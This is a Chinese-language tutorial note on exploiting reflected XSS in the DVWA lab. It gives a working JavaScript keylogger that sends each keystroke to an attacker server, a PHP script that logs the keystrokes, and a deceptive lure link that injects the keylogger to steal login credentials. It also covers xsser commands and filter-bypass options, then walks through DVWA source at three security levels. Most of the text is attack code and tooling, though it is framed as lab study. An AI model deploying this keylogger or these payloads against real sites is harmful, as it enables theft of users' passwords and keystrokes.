原则上:只要XSS漏洞存在,可以编写任何功能的js脚本
【反射型漏洞利用】
键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上
服务器:kali 客户端
启动apache2服务:service apache2 start
语法:
keylogger.js
1 document.onkeypress = function(evt) {
2 evt = evt || window.event
3 key = String.fromCharCode(evt.charCode)
4 if(key) {
5 var http = new XMLHttpRequest();
6 var param = encodeURI(key)
7 http.open("POST","http://192.168.1.127/keylogger.php",true);
8 http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
9 http.send("key="+param);
10 }
11 }
12 ~
keylogger.php 【用来接受客户端提交上来的数据】
1 <?php
2 $key=$_POST['key'];
3 $logfile="keylog.txt";
4 $fp = fopen($logfile,"a");
5 fwrite($fp,$key);
6 fclose($fp);
7 >
为避免被引起用户怀疑,可将跳转命令置于html文件中
前提 :用户已经登录网站,获得其cookie信息
# 伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码
a.hmlt
1 <a href="http://192.168.1.107/dvwa/vulnerabilities/xss_r/?name=<scripr+src='http://192.168.56.102/keylogger.js'></script>">诱人字眼</a>
XSS利用工具
Xsser 【专门针对XSS漏洞,使用python编写】
可使用图形化界面 xsser --gtk 【不建议使用,界面不够友好】
可绕过服务器端输入筛选 【xss存在极其普遍】
1、编码 10进制/16进制
2、函数:unecape()
简单使用语法 :xsser -u “http://192.168.56.101/dvwa/vulnerabilities/” -g “xss_r/?name=” --cookie=“security=low; PHPSESSID=31677b04bc31eac6cd78dbb1922e8028” -s -v --reverse-check
【 GET :将对应页面和参数写进**-g**参数中; POST :使用-P;-s:统计请求数;-v:显示详细信息;–reverse-check:禁止提交hash值方式验证(此方法存在误判)】
–heuristic 探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql} 【所有过滤机制都是基于字符过滤】
对payload编码,绕过服务器短筛选过滤 【过多编码可能造成语义误差】
1 *Select Bypasser(s)*:
2 These options can be used to encode selected vector(s) to try to
3 bypass possible anti-XSS filters on target(s) code and possible IPS
4 rules, if the target use it. Also, can be combined with other
5 techniques to provide encoding:
6
7 --Str Use method String.FromCharCode()
8 --Une Use Unescape() function
9 --Mix Mix String.FromCharCode() and Unescape()
10 --Dec Use Decimal encoding
11 --Hex Use Hexadecimal encoding
12 --Hes Use Hexadecimal encoding, with semicolons
13 --Dwo Encode vectors IP addresses in DWORD
14 --Doo Encode vectors IP addresses in Octal
15 --Cem=CEM Try -manually- different Character Encoding Mutations
16 (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
注入技术
1 *Special Technique(s)*:
2 These options can be used to try to inject code using different type
3 of XSS techniques. You can choose multiple:
4
5 --Coo COO - Cross Site Scripting Cookie injection
6 --Xsa XSA - Cross Site Agent Scripting
7 --Xsr XSR - Cross Site Referer Scripting
8 --Dcp DCP - Data Control Protocol injections
9 --Dom DOM - Document Object Model injections
10 --Ind IND - HTTP Response Splitting Induced code
11 --Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
12 --Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters
1 *Select Final injection(s)*:
2 These options can be used to specify the final code to inject in
3 vulnerable target(s). Important, if you want to exploit on-the-wild
4 your discovered vulnerabilities. Choose only one option:
5
6 --Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
7 --Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
8 --Doss DOSs - XSS Denial of service (server) injection
9 --Dos DOS - XSS Denial of service (client) injection
10 --B64 B64 - Base64 code encoding in META tag (rfc2397)
11
12 *Special Final injection(s)*:
13 These options can be used to execute some 'special' injection(s) in
14 vulnerable target(s). You can select multiple and combine with your
15 final code (except with DCP code):
16
17 --Onm ONM - Use onMouseMove() event to inject code
18 --Ifr IFR - Use <iframe> source tag to inject code
源码分析
低安全级别 【$_GET[]:直接回显输入的数据,不做任何过滤】
1 <?php
2
3 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4
5 $isempty = true;
6
7 } else {
8
9 echo '<pre>';
10 echo 'Hello ' . $_GET['name'];
11 echo '</pre>';
12
13 }
14
15 ?>
中安全级别 【在输出时替换script为空,可拆分重整script为scriscriptpt】
1 <?php
2
3 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4
5 $isempty = true;
6
7 } else {
8
9 echo '<pre>';
10 echo 'Hello ' . str_replace('<script>', '', $_GET['name']);
11 echo '</pre>';
12
13 }
14
15 ?>
高安全级别【htmlspecialchars():进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如<a href=>】)】{可用burpsuite进行编码}
1 <?php
2
3 if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){
4
5 $isempty = true;
6
7 } else {
8
9 echo '<pre>';
10 echo 'Hello ' . htmlspecialchars($_GET['name']);
11 echo '</pre>';
12
13 }
14
15 ?>